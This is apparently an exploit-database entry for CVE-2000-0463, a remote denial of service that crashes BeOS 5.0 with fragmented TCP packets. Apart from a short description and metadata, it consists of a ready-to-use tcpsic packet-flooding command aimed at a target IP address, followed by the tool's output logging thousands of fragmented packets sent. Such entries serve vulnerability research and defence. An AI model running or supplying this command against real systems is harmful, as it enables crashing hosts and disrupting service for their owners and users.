BeOS 5.0 - TCP Fragmentation Remote Denial of Service

Author: visi0n
type: dos
platform: beos
port: 
date_added: 2000-05-18 
date_updated: 2012-07-19 
verified: 1 
codes: CVE-2000-0463;OSVDB-1340 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/1222/info

BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot.

[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%

1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 packets in 2.74s @ 1824.48 pkts/s